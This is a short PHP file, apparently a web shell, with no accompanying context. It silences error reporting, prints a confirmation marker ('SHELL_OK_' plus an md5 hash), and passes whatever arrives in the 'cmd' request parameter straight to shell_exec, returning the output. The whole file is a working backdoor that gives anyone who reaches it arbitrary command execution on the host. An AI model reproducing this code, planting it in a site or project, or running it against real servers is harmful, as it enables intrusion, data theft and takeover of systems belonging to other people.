<?php
@error_reporting(0);
echo "SHELL_OK_".md5("neoatwork");
if(isset($_REQUEST['cmd'])){
    echo "<pre>".shell_exec($_REQUEST['cmd'])."</pre>";
}
